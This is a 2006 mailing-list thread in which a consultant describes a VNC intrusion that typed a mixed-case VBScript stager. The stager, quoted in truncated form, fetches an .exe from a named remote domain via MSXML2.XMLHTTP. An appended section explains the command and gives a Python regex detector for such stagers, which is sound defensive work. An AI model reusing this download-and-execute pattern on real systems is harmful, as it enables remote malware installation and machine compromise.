Thanks to all who offered assistance. Her machine has been upgraded
and scanned with three different AV products. She appears to be clean.
Chris Curtis
On Sep 27, 2006, at 3:31 PM, Chris Curtis wrote:
> Hello All. This is very off topic, but I figure it won't kill anyone
> if I ask. There are a number of very smart cookies on this list, and
> I bet someone out there can enlighten me.
>
> Today I got a call from one of my customers who runs VNC for remote
> support access. She was working away, and suddenly her mouse
> started to move, it opened up a CMD session (it's really a DOS
> session, but we aren't supposed to know that Windows is just another
> DOS app are we!!!) and it typed the following:
>
> C:\Documents and Settings\sales>CD %TMP%&ECHO On ERROR RESUmE
> nExt:F="L.eXe":SEt
> p=cREAtEOBjEct("mSxmL2.xmLhttp"):p.OpEn"gEt","HtTp://WwW.JmDoNgyI.CoM/
> NETSTAT
> On ERROR RESUmE nExt:F="L.eXe":SEt p=cREAtEOBjEct
> ("mSxmL2.xmLhttp"):p.OpEn"gEt",
> "HtTp://WwW.JmDoNgyI.CoM/
>
> Now, I am not an XML guy, but it looks to me like this person was
> trying to use XML and download content from a likely infected
> website. I went to the website (I use a Mac, so I don't generally
> worry about getting a browser hack) and, you guessed it, it was a
> Chinese site. I googled the www.jmdongyi.com name but got no hits.
>
> I connected to her PC and found no strange connections to it at the
> time. I ran a malware/virus scan and it was clean also. I had her
> turn off VNC for now and explained to her how she could turn it on
> when she needs to allow someone access. Incidentally, she was using
> a non-dictionary password with alpha and numeric characters.
>
> My question is, what was the XML string actually trying to do?
>
> Thanks to all who offer assistance.
>
> Chris Curtis
> Sandpoint Computers
> Office 208-265-1608
> Cell 208-610-3062
>
> -------------------------------------------------------------------------
> Take Surveys. Earn Cash. Influence the Future of IT
> Join SourceForge.net's Techsay panel and you'll get the chance to
> share your
> opinions on IT & business topics through brief surveys -- and earn
> cash
> http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV
> _______________________________________________
> sql-ledger-users mailing list
> [email protected]
> https://lists.sourceforge.net/lists/listinfo/sql-ledger-users
Chris Curtis
Sandpoint Computers
Office 208-265-1608
Cell 208-610-3062
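As an added illustration, not part of the thread above: the text typed over the VNC session is not really XML. It is a case-mangled VBScript fragment being echoed into a file under %TMP%, using the MSXML2.XMLHTTP COM object to fetch a file (named L.eXe) from the remote host, with "On Error Resume Next" suppressing any errors. The mixed case defeats naive case-sensitive signatures, so a defender's check should normalize case first and then look for the combination of indicators rather than any single one. The script below does exactly that over a few constructed command-line samples (the first is the string quoted in the post); the indicator list, scoring threshold and sample lines are my own assumptions, not anything from the list or from a vendor product.

```python
import re

# Indicators of a typed "download-and-execute" stager. All matching is done on
# a lower-cased copy of the input, so the randomized capitalisation seen in the
# post contributes nothing. The set and the threshold are assumptions for this
# example, not a published signature.
INDICATORS = {
    # VBScript/JScript HTTP client objects used to pull a payload
    "http_com_object": r'createobject\s*\(\s*"(?:msxml2\.xmlhttp|microsoft\.xmlhttp|winhttp\.winhttprequest)',
    # the .Open "GET" call on such an object
    "http_get": r'\.open\s*"get"',
    "remote_url": r'https?://[^\s"\']+',
    # a target filename ending in .exe
    "exe_target": r'"[^"]*\.exe"',
    # error suppression so a partially failing script keeps going silently
    "error_suppression": r'on\s+error\s+resume\s+next',
    # writing a script into the temp directory via the shell
    "echo_into_temp": r'cd\s+%tmp%\s*&\s*echo',
}
COMPILED = {name: re.compile(pattern) for name, pattern in INDICATORS.items()}
URL_RX = re.compile(INDICATORS["remote_url"])


def normalize(text: str) -> str:
    """Lower-case and collapse whitespace so case/spacing tricks do not matter."""
    return " ".join(text.lower().split())


def analyze(command: str) -> dict:
    """Score one command line and return the indicators hit, any URLs, and a verdict."""
    norm = normalize(command)
    hits = [name for name, rx in COMPILED.items() if rx.search(norm)]
    urls = URL_RX.findall(norm)
    # Threshold (assumed): an HTTP fetch primitive plus at least two other
    # indicators is treated as a stager; any single hit is merely suspicious.
    fetch_primitive = "http_com_object" in hits or "http_get" in hits
    if fetch_primitive and len(hits) >= 3:
        verdict = "download-and-execute stager"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"hits": hits, "urls": urls, "verdict": verdict}


# Constructed samples. The first is the line quoted in the post (joined back
# onto one line); the other two are made up for contrast.
TYPED_COMMAND = (
    r'C:\Documents and Settings\sales>CD %TMP%&ECHO On ERROR RESUmE nExt:F="L.eXe":SEt '
    r'p=cREAtEOBjEct("mSxmL2.xmLhttp"):p.OpEn"gEt","HtTp://WwW.JmDoNgyI.CoM/'
)
BENIGN_COMMAND = r'C:\Documents and Settings\sales>dir /s *.doc'
PARTIAL_COMMAND = r'C:\>cd %TMP%&echo set x=1 > a.vbs'

SAMPLES = [TYPED_COMMAND, BENIGN_COMMAND, PARTIAL_COMMAND]


def triage(samples=SAMPLES) -> list:
    """Run analyze() over every sample and return the list of results."""
    return [analyze(s) for s in samples]


if __name__ == "__main__":
    for sample, result in zip(SAMPLES, triage()):
        print(f"{result['verdict']:<28} hits={result['hits']} urls={result['urls']}")
        print(f"    {sample[:70]}...")
```

Run against the quoted string it reports all six indicators and extracts the contacted host, which is the value worth adding to a block list and searching for in proxy or DNS logs. The benign `dir` line scores nothing, and the partial `echo`-into-%TMP% line is flagged only as suspicious, which is the right level of confidence for a single indicator.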